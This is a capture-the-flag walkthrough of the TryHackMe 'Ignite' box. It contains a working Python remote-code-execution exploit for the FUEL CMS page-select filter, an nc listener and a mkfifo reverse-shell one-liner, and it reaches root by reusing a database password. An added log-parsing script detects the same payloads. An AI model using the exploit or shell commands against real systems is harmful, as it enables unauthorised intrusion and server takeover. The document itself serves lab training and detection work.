TryHackMe | Ignite

Reconnaissance

Start with a simple nmap scan to see which ports are open and which services are running on them.

nmap -sC -sV -O -oA simple_scan 10.10.75.216
  • -sC: run default nmap scripts
  • -sV: detect service version
  • -O: detect OS
  • -oA: write the output in all three formats using the base filename simple_scan

Enumeration

Open the URL in a browser.

http://10.10.75.216/
The first version of the exploit script (Python 2), pointing at a local instance on 127.0.0.1:8881 through a proxy on 127.0.0.1:8080:

import requests
import urllib

url = "http://127.0.0.1:8881"

def find_nth_overlapping(haystack, needle, n):
    # Return the index of the n-th occurrence of needle in haystack (-1 if absent)
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
    xxxx = raw_input('cmd:')
    burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
    proxy = {"http":"http://127.0.0.1:8080"}
    r = requests.get(burp0_url, proxies=proxy)

    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)

    # Print the response only up to the second occurrence of its first 20 characters
    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)

    print r.text[0:dup]
The same script pointed at the target, with the proxy removed:

import requests
import urllib

url = "http://10.10.75.216"

def find_nth_overlapping(haystack, needle, n):
    # Return the index of the n-th occurrence of needle in haystack (-1 if absent)
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
    xxxx = raw_input('cmd:')
    burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"

    r = requests.get(burp0_url)

    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)

    # Print the response only up to the second occurrence of its first 20 characters
    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)

    print r.text[0:dup]
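From the defender's side, every request the script above sends lands in the web server's access log with the URL-encoded PHP expression in the filter parameter. The following detection script is an added example written for this walkthrough, not code from the original post: it parses Apache combined-format log lines (the lines are constructed here, including the client IPs and user agents), decodes the filter parameter of requests to /fuel/pages/select/, and flags values that contain PHP call syntax ($variable or name( ) where a plain search string is expected.

```python
"""Flag requests that abuse the /fuel/pages/select/ filter parameter.

Added example (not from the walkthrough). Looks for PHP function-call
syntax in the decoded `filter` query parameter of the page-select endpoint.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache "combined" log lines for the example (not real traffic).
SAMPLE_LOG = """\
10.8.13.70 - - [10/Jul/2020:14:02:11 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27id%27%29%2b%27 HTTP/1.1" 200 5123 "-" "python-requests/2.22.0"
10.10.0.5 - - [10/Jul/2020:14:03:40 +0000] "GET /fuel/pages/select/?filter=about HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.10.0.6 - - [10/Jul/2020:14:04:02 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.8.13.70 - - [10/Jul/2020:14:05:19 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27whoami%27%29%2b%27 HTTP/1.1" 200 4990 "-" "curl/7.68.0"
"""

# Client IP, timestamp, request target and status code from a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# PHP-looking tokens: a $variable, or an identifier immediately followed by "("
PHP_CALL_RE = re.compile(r"\$\w+|\b[A-Za-z_]\w*\s*\(")


def decode_filter(target):
    """Return the decoded filter parameter of a page-select request, else None."""
    parts = urlsplit(target)
    if not parts.path.startswith("/fuel/pages/select"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("filter")
    if not values:
        return None
    # parse_qs already percent-decodes once; decode again to catch double encoding
    return unquote(values[0])


def scan_access_log(text):
    """Return one record per request whose filter value contains PHP call syntax."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        value = decode_filter(m.group("target"))
        if value is None:
            continue
        indicators = []
        for token in PHP_CALL_RE.findall(value):
            if token not in indicators:
                indicators.append(token)
        if indicators:
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "filter": value,
                "indicators": indicators,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("%(ip)s %(ts)s filter=%(filter)r indicators=%(indicators)s" % hit)
```

The decoded value of a malicious request reads '+pi(print($a='system'))+$a('id')+', which no legitimate search term resembles, so the rule has a low false-positive rate; the plain request for filter=about produces no indicators.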
Start a listener on the attacking machine:

nc -lvp 7896

Send a reverse shell back to it through the exploit's command prompt:

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.8.13.70 7896 > /tmp/f

Upgrade the shell to an interactive TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Privilege Escalation

I ran a couple of enumeration scripts but got nothing interesting. So I started looking around for background processes, but again found nothing.

The application's database configuration is readable, and the password stored in it also works for root:

cd /var/www/html/fuel/application/config
cat /var/www/html/fuel/application/config/database.php
su root
cat /root/root.txt
